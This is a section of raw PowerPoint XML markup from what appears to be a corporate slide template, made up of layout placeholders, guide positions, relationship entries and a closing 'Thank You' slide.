          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED9278AC-E332-4142-AA14-60688B5140C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70544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278AC-E332-4142-AA14-60688B5140C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383773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278AC-E332-4142-AA14-60688B5140C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2184930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9278AC-E332-4142-AA14-60688B5140C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="851163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jpg"/><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slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag46.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Master" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag65.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6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Master" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag70.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7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8.xml"/><Relationship Id="rId7"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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3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9459FA-0BBD-4C23-967C-7DDC65B7AD38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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233358" y="485435"/>
            <a:ext cx="1653211" cy="529027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1895641"/>
            <a:ext cx="10972800" cy="1177506"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3600" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to Add a Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3094852"/>
            <a:ext cx="10963923" cy="917516"/>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a Subtitle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339460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11312"/>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3945">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="3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ur Content Subtitle">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5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414730"/>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2" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6197600" y="1414730"/>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hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3965268"/>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hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6197600" y="3965268"/>
            <a:ext cx="5376672" cy="2377440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>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5" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId6"/>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1680194587"/>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4003">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="52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0" y="1311214"/>
            <a:ext cx="12192000" cy="5093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609600" y="68332"/>
            <a:ext cx="11582400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to Add a Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1417319"/>
            <a:ext cx="10972800" cy="4846320"/>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custDataLst>
              <p:tags r:id="rId4"/>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1276138479"/>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lumn Gray">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="0" y="1311214"/>
            <a:ext cx="12192000" cy="5093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custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to Add a Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1417320"/>
            <a:ext cx="5384800" cy="4846320"/>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custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6197600" y="1417320"/>
            <a:ext cx="5384800" cy="4846320"/>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5"/>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87973866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alf Gra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4" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="838200"/>
            <a:ext cx="11582400" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" i="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to Add a Subtitle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="0" y="3959188"/>
            <a:ext cx="12192000" cy="2441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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="1417320"/>
            <a:ext cx="10972800" cy="4846320"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4068654852"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst mod="1">
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="528">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="888">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="3948">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="384">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" pos="7296">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Gray Bar_1">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3197523" y="0"/>
            <a:ext cx="8994476" cy="64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3519488" y="57150"/>
            <a:ext cx="8672511"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322054" y="370937"/>
            <a:ext cx="2587924" cy="5877463"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to add text or choose an icon below to insert other content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3519578" y="1414463"/>
            <a:ext cx="8367623" cy="4846320"/>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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3519488" y="838200"/>
            <a:ext cx="8672511"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4169017165"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst mod="1">
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" pos="2217">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="7488">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="528">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="888">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="3945">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="233">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="203">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="183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Gray Bar_2">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8534400" y="0"/>
            <a:ext cx="3657600" cy="64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609600" y="65776"/>
            <a:ext cx="7620000"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609600" y="1414462"/>
            <a:ext cx="7620000" cy="4846637"/>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6" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8737600" y="228600"/>
            <a:ext cx="3251200" cy="6019800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to add text or choose an icon below to insert other content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609601" y="838200"/>
            <a:ext cx="7625751"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4155250500"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst mod="1">
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" pos="384">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="5184">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="3944">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="888">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="528">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="144">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="5503">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="7560">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Left Gray Bar">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4145280" cy="64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hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4449234" y="65776"/>
            <a:ext cx="7742767" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to Add a Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4449233" y="1414463"/>
            <a:ext cx="7437120" cy="4846637"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr/>
            </a:lvl3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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="228600"/>
            <a:ext cx="3596640" cy="6019800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="233363" indent="-233363">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="-227013">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1800" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="690563" indent="-236538">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="690563" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1600" baseline="0"/>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to add text or choose an icon below to insert other content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4449234" y="838200"/>
            <a:ext cx="7742767"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2674761521"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst mod="1">
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="528">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="888">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="3944">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="173">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" pos="2441">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" pos="7488">
          <p15:clr>
            <a:srgbClr val="5ACBF0"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="280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7BCB2-9D0A-499A-B2BE-A59EFA404956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>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233358" y="485435"/>
            <a:ext cx="1653211" cy="529027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1360968" y="2558734"/>
            <a:ext cx="4363427" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>Thank You</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1136373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logo">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3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267351" y="2843832"/>
            <a:ext cx="3657298" cy="1170335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2340260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US" dirty="0"/>
              <a:t>Click to Add a Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1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4023015"/>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3">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
        <p:nvSpPr>
          <p:cNvPr id="3" name="Vertical Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>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8094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9770300" y="365125"/>
            <a:ext cx="1813687" cy="58975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custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609601" y="365125"/>
            <a:ext cx="9022914" cy="58975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283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ynopsys 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4057EF-F0C7-4197-82D0-267908AF3CF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
